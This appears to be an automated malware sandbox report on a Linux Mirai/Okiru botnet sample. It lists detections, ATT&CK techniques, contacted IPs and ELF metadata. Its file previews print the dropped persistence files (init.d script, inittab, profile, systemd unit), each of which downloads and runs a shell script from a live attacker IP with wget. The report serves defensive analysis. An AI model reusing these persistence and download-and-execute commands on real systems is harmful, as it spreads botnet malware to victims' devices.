          Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6327, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: x86_64.nn.elf, type: SAMPLE
          Source: Yara matchFile source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: x86_64.nn.elf, type: SAMPLE
          Source: Yara matchFile source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6255, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6316, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6318, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6326, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6327, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information2
          Scripting
          Valid AccountsWindows Management Instrumentation1
          Unix Shell Configuration Modification
          1
          Unix Shell Configuration Modification
          1
          Masquerading
          1
          OS Credential Dumping
          1
          Security Software Discovery
          Remote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network Medium1
          Data Manipulation
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          Systemd Service
          1
          Systemd Service
          2
          File and Directory Permissions Modification
          LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
          Non-Standard Port
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAt2
          Scripting
          Logon Script (Windows)1
          File Deletion
          Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          No configs have been found
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Number of created Files
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1574207 Sample: x86_64.nn.elf Startdate: 13/12/2024 Architecture: LINUX Score: 100 51 35.38.189.105, 23, 37312 UMICH-AS-5US United States 2->51 53 191.141.13.246, 23, 43330 TIMSABR Brazil 2->53 55 28 other IPs or domains 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 Antivirus / Scanner detection for submitted sample 2->59 61 Multi AV Scanner detection for submitted file 2->61 63 3 other signatures 2->63 8 x86_64.nn.elf 2->8         started        12 udisksd dumpe2fs 2->12         started        14 udisksd dumpe2fs 2->14         started        16 8 other processes 2->16 signatures3 process4 file5 43 /etc/rc.local, POSIX 8->43 dropped 45 /etc/profile, ASCII 8->45 dropped 47 /etc/init.d/system, POSIX 8->47 dropped 65 Sample tries to set files in /etc globally writable 8->65 67 Sample tries to persist itself using /etc/profile 8->67 69 Drops files in suspicious directories 8->69 71 2 other signatures 8->71 18 x86_64.nn.elf sh 8->18         started        20 x86_64.nn.elf sh 8->20         started        22 x86_64.nn.elf sh 8->22         started        24 5 other processes 8->24 signatures6 process7 file8 28 sh chmod 18->28         started        31 sh ln 20->31         started        33 sh chmod 22->33         started        49 /etc/init.d/sh, POSIX 24->49 dropped 73 Drops files in suspicious directories 24->73 35 sh ln 24->35         started        37 sh systemctl 24->37         started        39 sh mkdir 24->39         started        41 4 other processes 24->41 signatures9 process10 signatures11 75 Sample tries to set files in /etc globally writable 28->75 77 Sample tries to persist itself using System V runlevels 31->77

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          x86_64.nn.elf39%VirustotalBrowse
          x86_64.nn.elf42%ReversingLabsLinux.Backdoor.Mirai
          x86_64.nn.elf100%AviraEXP/ELF.Mirai.W
          x86_64.nn.elf100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          /etc/init.d/sh3%ReversingLabsText.Browser.Generic
          /etc/init.d/system3%ReversingLabsText.Browser.Generic
          /etc/rc.local0%ReversingLabs
          /etc/rc.local0%VirustotalBrowse
          No Antivirus matches
          No Antivirus matches
          No contacted domains info
          NameSourceMaliciousAntivirus DetectionReputation
          http://94.156.227.233/curl.shx86_64.nn.elffalse
            high
            http://94.156.227.233/lol.shx86_64.nn.elffalse
              high
              http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sx86_64.nn.elffalse
                high
                http://94.156.227.233/x86_64.nn.elf, sh.32.dr, profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, custom.service.12.drfalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  111.125.55.91
                  unknownJapan9614OCTOitaCableTelecomColtdJPfalse
                  154.216.19.139
                  unknownSeychelles
                  135357SKHT-ASShenzhenKatherineHengTechnologyInformationCofalse
                  62.225.116.100
                  unknownGermany
                  3320DTAGInternetserviceprovideroperationsDEfalse
                  122.159.244.47
                  unknownChina
                  4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                  191.141.13.246
                  unknownBrazil
                  26615TIMSABRfalse
                  28.27.182.234
                  unknownUnited States
                  7922COMCAST-7922USfalse
                  73.218.255.124
                  unknownUnited States
                  7922COMCAST-7922USfalse
                  156.144.18.206
                  unknownUnited States
                  3743ARCEL-2USfalse
                  215.52.26.4
                  unknownUnited States
                  721DNIC-ASBLK-00721-00726USfalse
                  47.141.90.29
                  unknownUnited States
                  5650FRONTIER-FRTRUSfalse
                  94.156.227.234
                  unknownBulgaria
                  57463NETIXBGfalse
                  216.250.19.190
                  unknownUnited States
                  26284BADGER-INTERNET-INCUSfalse
                  35.38.189.105
                  unknownUnited States
                  36375UMICH-AS-5USfalse
                  91.189.91.43
                  unknownUnited Kingdom
                  41231CANONICAL-ASGBfalse
                  91.189.91.42
                  unknownUnited Kingdom
                  41231CANONICAL-ASGBfalse
                  9.129.94.122
                  unknownUnited States
                  3356LEVEL3USfalse
                  223.38.1.80
                  unknownKorea Republic of
                  9644SKTELECOM-NET-ASSKTelecomKRfalse
                  219.241.165.108
                  unknownKorea Republic of
                  9318SKB-ASSKBroadbandCoLtdKRfalse
                  109.202.202.202
                  unknownSwitzerland
                  13030INIT7CHfalse
                  52.84.118.146
                  unknownUnited States
                  16509AMAZON-02USfalse
                  53.236.44.244
                  unknownGermany
                  31399DAIMLER-ASITIGNGlobalNetworkDEfalse
                  103.196.5.144
                  unknownIndia
                  7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
                  116.88.3.27
                  unknownSingapore
                  10091STARHUB-CABLEStarHubLtdSGfalse
                  45.126.195.192
                  unknownAustralia
                  137968PSPL-AS-APPen10ServicesPtyLtdAUfalse
                  205.181.36.236
                  unknownUnited States
                  3356LEVEL3USfalse
                  6.211.13.65
                  unknownUnited States
                  3356LEVEL3USfalse
                  18.242.255.3
                  unknownUnited States
                  16509AMAZON-02USfalse
                  167.167.140.221
                  unknownUnited States
                  51964ORANGE-BUSINESS-SERVICES-IPSN-ASNFRfalse
                  204.76.192.171
                  unknownUnited States
                  16957IDAHOPOWER-NETWORKUSfalse
                  213.55.245.14
                  unknownSwitzerland
                  15796SALT-CHfalse
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  154.216.19.139tXcFA8apHU.exeGet hashmaliciousRemcosBrowse
                    x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                      m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                        m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                          powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                            arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                              m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                  m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                    m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                      94.156.227.234x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                        91.189.91.43.i.elfGet hashmaliciousUnknownBrowse
                                          spc.elfGet hashmaliciousUnknownBrowse
                                            .i.elfGet hashmaliciousUnknownBrowse
                                              tftp.elfGet hashmaliciousUnknownBrowse
                                                violetx86.elfGet hashmaliciousUnknownBrowse
                                                  sshd.elfGet hashmaliciousUnknownBrowse
                                                    bin.sh.elfGet hashmaliciousMiraiBrowse
                                                      php-fpmGet hashmaliciousUnknownBrowse
                                                        loligang.m68k.elfGet hashmaliciousMiraiBrowse
                                                          loligang.arm6.elfGet hashmaliciousMiraiBrowse
                                                            91.189.91.42.i.elfGet hashmaliciousUnknownBrowse
                                                              spc.elfGet hashmaliciousUnknownBrowse
                                                                .i.elfGet hashmaliciousUnknownBrowse
                                                                  tftp.elfGet hashmaliciousUnknownBrowse
                                                                    violetx86.elfGet hashmaliciousUnknownBrowse
                                                                      sshd.elfGet hashmaliciousUnknownBrowse
                                                                        bin.sh.elfGet hashmaliciousMiraiBrowse
                                                                          php-fpmGet hashmaliciousUnknownBrowse
                                                                            loligang.m68k.elfGet hashmaliciousMiraiBrowse
                                                                              loligang.arm6.elfGet hashmaliciousMiraiBrowse
                                                                                No context
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                DTAGInternetserviceprovideroperationsDEarm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 217.229.45.57
                                                                                mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 91.18.248.73
                                                                                sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 84.148.23.119
                                                                                b3astmode.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                • 91.33.180.45
                                                                                b3astmode.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                • 2.165.219.165
                                                                                b3astmode.spc.elfGet hashmaliciousMiraiBrowse
                                                                                • 217.247.221.226
                                                                                b3astmode.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                • 79.237.170.124
                                                                                b3astmode.x86.elfGet hashmaliciousMiraiBrowse
                                                                                • 84.137.24.79
                                                                                jade.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                • 62.156.228.137
                                                                                jade.arm.elfGet hashmaliciousMiraiBrowse
                                                                                • 31.245.105.247
                                                                                OCTOitaCableTelecomColtdJP.5r3fqt67ew531has4231.x86.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                • 203.213.171.132
                                                                                jmhgeojeri.elfGet hashmaliciousUnknownBrowse
                                                                                • 123.100.221.177
                                                                                loligang.mips-20241128-1536.elfGet hashmaliciousMiraiBrowse
                                                                                • 122.152.91.183
                                                                                x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                • 182.173.150.184
                                                                                x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 101.55.144.96
                                                                                jew.mips.elfGet hashmaliciousMiraiBrowse
                                                                                • 123.50.227.232
                                                                                nabarm.elfGet hashmaliciousUnknownBrowse
                                                                                • 122.152.89.158
                                                                                la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                • 203.213.162.121
                                                                                la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                • 101.55.163.9
                                                                                la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                • 203.213.171.139
                                                                                SKHT-ASShenzhenKatherineHengTechnologyInformationCob3astmode.arm.elfGet hashmaliciousMiraiBrowse
                                                                                • 154.211.34.20
                                                                                file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                • 154.216.20.243
                                                                                file.exeGet hashmaliciousXmrigBrowse
                                                                                • 154.216.20.243
                                                                                file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                • 154.216.20.243
                                                                                file.exeGet hashmaliciousXmrigBrowse
                                                                                • 154.216.20.243
                                                                                jew.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                • 45.207.239.54
                                                                                Strait STS.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                • 154.216.18.216
                                                                                mips.elfGet hashmaliciousMiraiBrowse
                                                                                • 156.226.9.180
                                                                                https://u48551708.ct.sendgrid.net/ls/click?upn=u001.ztPEaTmy8WofhPYJ48HDSCunUq5pm5yTGRhe-2B0bVSngC8hMYiy6PgMy1xJOG8JJZaOsK-2FG9SE7UmhEzeQSXDmEf7Z3nlXZDH-2BW1HSMP6c8uYUvXDTaJRyLbPDV6bI3nnDyIlM0OJKevMwAF04rpfLmQEYS641NQTMU227kkOtBQgQK-2FNlHeN6DpPMLDgH6kuMS3X_2vbC1nrAFjePip8HYuHYOlkYXiy7Z-2FrO9MQN7lNoEgxRkovUJGAEvKvTFyRmFsa9AQlcDpFhpJzgHajMOC0yWTZOc2DdmxhrlyPvteyXbl8nlhAtf2p-2FHw4RnlZ8cxDY-2BWJeBsszGnsrXuNOI8LpL5ZYI3ad04OdxC8tHHA5tO-2Be1xS3Z9Z3VrOTM-2FT5ptoYnx5N-2FTYKQ13RZ-2FookVMhAtJ6OV43Zayd1qOmHGLwUI8-3DGet hashmaliciousPhisherBrowse
                                                                                • 154.216.20.188
                                                                                Reqt 83291.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                • 154.216.18.62
                                                                                No context
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                /etc/init.d/systemx86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                      x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                        x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                            /etc/init.d/shx86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                              x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                  x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                    x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                      x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                        Process:/tmp/x86_64.nn.elf
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):111
                                                                                                        Entropy (8bit):4.663595298101345
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:KPJRK+KFtSyLdjX48FIbILbaaFOdFXa5O:WJ8+KHSYZX48bbaaeXCO
                                                                                                        MD5:3290F4F4E0B77B577C59026DEF246CEE
                                                                                                        SHA1:C51EAE7170430B5697B881BE716280D1FAAA9147
                                                                                                        SHA-256:534E1753E7B5026C5F689F31942BD84E7869232A5CE24AE02B0A9647B3E2EDCD
                                                                                                        SHA-512:DFE561F390A0003C92D0528D418CADA2A84DD4585F838F4A37BDD1790C8B7E947AFD31B527E4F98AD55F49F4168F4574540CCFF2D2EE38BD2A3923DEB9FE6345
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:run bootcmd_mmc0; /bin/sh && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                                                                                        Process:/bin/sh
                                                                                                        File Type:POSIX shell script, ASCII text executable
                                                                                                        Category:dropped
                                                                                                        Size (bytes):355
                                                                                                        Entropy (8bit):4.416220583499086
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:h2Rk8d/Kd6Nx/SNAjDTZX48bJaJFCwWBvM1FnwfUMdNfabwHeJdxL/RuYHdSOovl:QRkobNxaNoPUJgjvM1F5KN+dRRucSOyl
                                                                                                        MD5:4C835AF4434E28E5B56D8CDFA8EE753D
                                                                                                        SHA1:B18DA30B2DF68AE4C788540CED328CA545C02F42
                                                                                                        SHA-256:CA0FAC03BB49D9F40E83353A3C85D27B8AD800B8A77F88D1B43025148672E28D
                                                                                                        SHA-512:877B96464C5D6AF38B84F8BE6ECDDA74A9703AA298A897B2EF8DEC9E9B929ECA2E8324979A80033B0E334820B15275E51C1E60EC5A26A7B379A2D8DA5BAC6162
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                        Joe Sandbox View:
                                                                                                        • Filename: x86_32.nn.elf, Detection: malicious, Browse
                                                                                                        • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                                                                                        • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                                                                                        • Filename: x86_32.nn.elf, Detection: malicious, Browse
                                                                                                        • Filename: x86_32.nn.elf, Detection: malicious, Browse
                                                                                                        • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                                                                                        Reputation:low
                                                                                                        Preview:#!/bin/sh.# /etc/init.d/sh..case "" in. start). echo 'Starting sh'. /bin/sh &. wget http://94.156.227.233/ -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping sh'. killall sh. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start|stop|restart}". exit 1. ;;.esac.exit 0.
                                                                                                        Process:/tmp/x86_64.nn.elf
                                                                                                        File Type:POSIX shell script, ASCII text executable
                                                                                                        Category:dropped
                                                                                                        Size (bytes):98
                                                                                                        Entropy (8bit):4.615605979741142
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:TKH4v9+KFyFiLdjX48FIbILpaKB0dFLoKE0:h8KooZX48bzBeLXE0
                                                                                                        MD5:FE7F857A52EC42881A76D01D4A4A1C3C
                                                                                                        SHA1:6391FE715F06AB2D7E58D18A41ED3A358C7E820C
                                                                                                        SHA-256:20B80070DF0EDB6A011753C41051823E2F87C46A5493D6323BB5C023A19D2870
                                                                                                        SHA-512:4AA09F596ACE2DA18FE88DA2224681EAB2A4F77D005E2C67E97E9A0751C387F8DCCD8D1BB05644D75ED2F42959B6EE491D292F80CFEBB5D80EA5F0CE84C47816
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                        Joe Sandbox View:
                                                                                                        • Filename: x86_32.nn.elf, Detection: malicious, Browse
                                                                                                        • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                                                                                        • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                                                                                        • Filename: x86_32.nn.elf, Detection: malicious, Browse
                                                                                                        • Filename: x86_32.nn.elf, Detection: malicious, Browse
                                                                                                        • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                                                                                        Reputation:low
                                                                                                        Preview:#!/bin/sh./bin/sh &.wget http://94.156.227.233/ -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.
                                                                                                        Process:/tmp/x86_64.nn.elf
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):103
                                                                                                        Entropy (8bit):4.612417623467759
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:nAWu5YFtSyLdjX48FIbILbaaFOdFXa5O:A6HSYZX48bbaaeXCO
                                                                                                        MD5:175C6814BBE06EB5816EFE3FE3934230
                                                                                                        SHA1:8C1A49BF7CA134E8AD0DDA70872367062BC600C5
                                                                                                        SHA-256:11CB198833B5FB514AF33682A7148F95AA28CAEA16908A27FA10D71DD272730E
                                                                                                        SHA-512:C1A6BC79D50EEED397A98329E7A2CD7486CBB36F9D3B25AEADA15473D10C31FC2F44D2029F5A174FC813E3BB6B974174850989BF2ADD642F4CD4F1D279B6B1F1
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:::respawn:/bin/sh && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                                                                                        Process:/tmp/x86_64.nn.elf
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):53
                                                                                                        Entropy (8bit):3.871459242626451
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
                                                                                                        MD5:2BD9B4BE30579E633FC0191AA93DF486
                                                                                                        SHA1:7D63A9BD9662E86666B27C1B50DB8E7370C624FF
                                                                                                        SHA-256:64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
                                                                                                        SHA-512:AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
                                                                                                        Malicious:false
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Preview:gorilla botnet is on the device ur not a cat go away.
                                                                                                        Process:/tmp/x86_64.nn.elf
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):94
                                                                                                        Entropy (8bit):4.486383977913608
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:pKWNFyFiLdjX48FIbILbaaFOdFXa50:kKooZX48bbaaeXC0
                                                                                                        MD5:CEC61C0CDC61AB271C45B85281469388
                                                                                                        SHA1:E2DC08B86AC16A6A9BDA73D26DE0055528C647D9
                                                                                                        SHA-256:AE69256D9ACCEE8C05AFBF46267368A0DDB3E5C9C54D24CFB018A35FEF86C560
                                                                                                        SHA-512:71A65EB5CBBD53E395E8A2B392CB41E289874583C4A17E086498201C6078E5043B680B4971D1913863B2699626F05F63B0936BAFCE9A8F01C6DBAFEE5E93F2A7
                                                                                                        Malicious:true
                                                                                                        Preview:/bin/sh &.wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.
                                                                                                        Process:/tmp/x86_64.nn.elf
                                                                                                        File Type:POSIX shell script, ASCII text executable
                                                                                                        Category:dropped
                                                                                                        Size (bytes):10
                                                                                                        Entropy (8bit):3.121928094887362
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:TKH4vn:hv
                                                                                                        MD5:3E2B31C72181B87149FF995E7202C0E3
                                                                                                        SHA1:BD971BEC88149956458A10FC9C5ECB3EB99DD452
                                                                                                        SHA-256:A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
                                                                                                        SHA-512:543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                        Preview:#!/bin/sh.
                                                                                                        Process:/tmp/x86_64.nn.elf
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):292
                                                                                                        Entropy (8bit):5.064804988275458
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:z8ifitRZAMzdK+Gs2+GWRdbZX48B+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+y+GWRdtd+GWRXY+GWRuL1I
                                                                                                        MD5:8156A50E9D158639626649BD134E7D5D
                                                                                                        SHA1:D95D108656621F4B4F82B93CA0694D66F4A2FEF4
                                                                                                        SHA-256:FB7F3B6DA55120E08AB0B9A9F4A9ECB1BB5D89BFD665EBE23C150FBFBC06E4D8
                                                                                                        SHA-512:DB79A871E5317E3B9A93FF84E71318F5ABC85EBDE7C9521DF35C20C0AD8251BEB3DB33673BE4F4FF2501256613C50128BA36323C0DECD348FF6CA8A73856BE10
                                                                                                        Malicious:false
                                                                                                        Preview:[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/bin/sh.ExecStartPost=/usr/bin/wget -O /tmp/lol.sh http://94.156.227.233/.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.
                                                                                                        Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):76
                                                                                                        Entropy (8bit):3.7627880354948586
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                                                                        MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                                                                        SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                                                                        SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                                                                        SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                                                                        Malicious:false
                                                                                                        Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                                                                        File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
                                                                                                        Entropy (8bit):6.310524229392396
                                                                                                        TrID:
                                                                                                        • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                                        File name:x86_64.nn.elf
                                                                                                        File size:97'600 bytes
                                                                                                        MD5:adf6b23cac984a3a3904655c9b93e95d
                                                                                                        SHA1:6b3eb5ca916435b936af388d0455cc67d40c8ef8
                                                                                                        SHA256:22edd9ca7bb64abffb6ff297dafad627e552a8922c3c442ae81643e828fb0dfe
                                                                                                        SHA512:f58fdecf8d876cafc10c7cd15ce74daaeed0cad06a2ccf152046667bc37ff39ba24121345eb47665c596112e9ea7ada9fea01378b3a83288acc758d740338044
                                                                                                        SSDEEP:1536:HPGOa+YLvmjwWrO2w1tH3BRs2d1mi//yvpW123WqCwhJ:HBa+YzmjdrO2mhBRh1mi3yI123Wqp
                                                                                                        TLSH:42933A07B6C0D4FDC45DC2344B6FA13AD562F69D0235B29B27D8FB262F8DE101A2D968
                                                                                                        File Content Preview:.ELF..............>.......@.....@........z..........@.8...@.......................@.......@.....pr......pr......................xr......xrQ.....xrQ..............1..............Q.td....................................................H...._.....<..H........

                                                                                                        ELF header

                                                                                                        Class:ELF64
                                                                                                        Data:2's complement, little endian
                                                                                                        Version:1 (current)
                                                                                                        Machine:Advanced Micro Devices X86-64
                                                                                                        Version Number:0x1
                                                                                                        Type:EXEC (Executable file)
                                                                                                        OS/ABI:UNIX - System V
                                                                                                        ABI Version:0
                                                                                                        Entry Point Address:0x400194
                                                                                                        Flags:0x0
                                                                                                        ELF Header Size:64
                                                                                                        Program Header Offset:64
                                                                                                        Program Header Size:56
                                                                                                        Number of Program Headers:3
                                                                                                        Section Header Offset:96960
                                                                                                        Section Header Size:64
                                                                                                        Number of Section Headers:10
                                                                                                        Header String Table Index:9
                                                                                                        NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                                        NULL0x00x00x00x00x0000
                                                                                                        .initPROGBITS0x4000e80xe80x130x00x6AX001
                                                                                                        .textPROGBITS0x4001000x1000x13d160x00x6AX0016
                                                                                                        .finiPROGBITS0x413e160x13e160xe0x00x6AX001
                                                                                                        .rodataPROGBITS0x413e400x13e400x34300x00x2A0032
                                                                                                        .ctorsPROGBITS0x5172780x172780x100x00x3WA008
                                                                                                        .dtorsPROGBITS0x5172880x172880x100x00x3WA008
                                                                                                        .dataPROGBITS0x5172a00x172a00x7e00x00x3WA0032
                                                                                                        .bssNOBITS0x517a800x17a800x29e80x00x3WA0032
                                                                                                        .shstrtabSTRTAB0x00x17a800x3e0x00x0001
                                                                                                        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                                        LOAD0x00x4000000x4000000x172700x172706.36420x5R E0x100000.init .text .fini .rodata
                                                                                                        LOAD0x172780x5172780x5172780x8080x31f03.73910x6RW 0x100000.ctors .dtors .data .bss
                                                                                                        GNU_STACK0x00x00x00x00x00.00000x6RW 0x8
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Dec 13, 2024 04:22:58.133380890 CET4789223192.168.2.23205.181.36.236
                                                                                                        Dec 13, 2024 04:22:58.135852098 CET4151823192.168.2.2345.126.195.192
                                                                                                        Dec 13, 2024 04:22:58.138140917 CET5843423192.168.2.23156.144.18.206
                                                                                                        Dec 13, 2024 04:22:58.139276028 CET6001838242192.168.2.2394.156.227.234
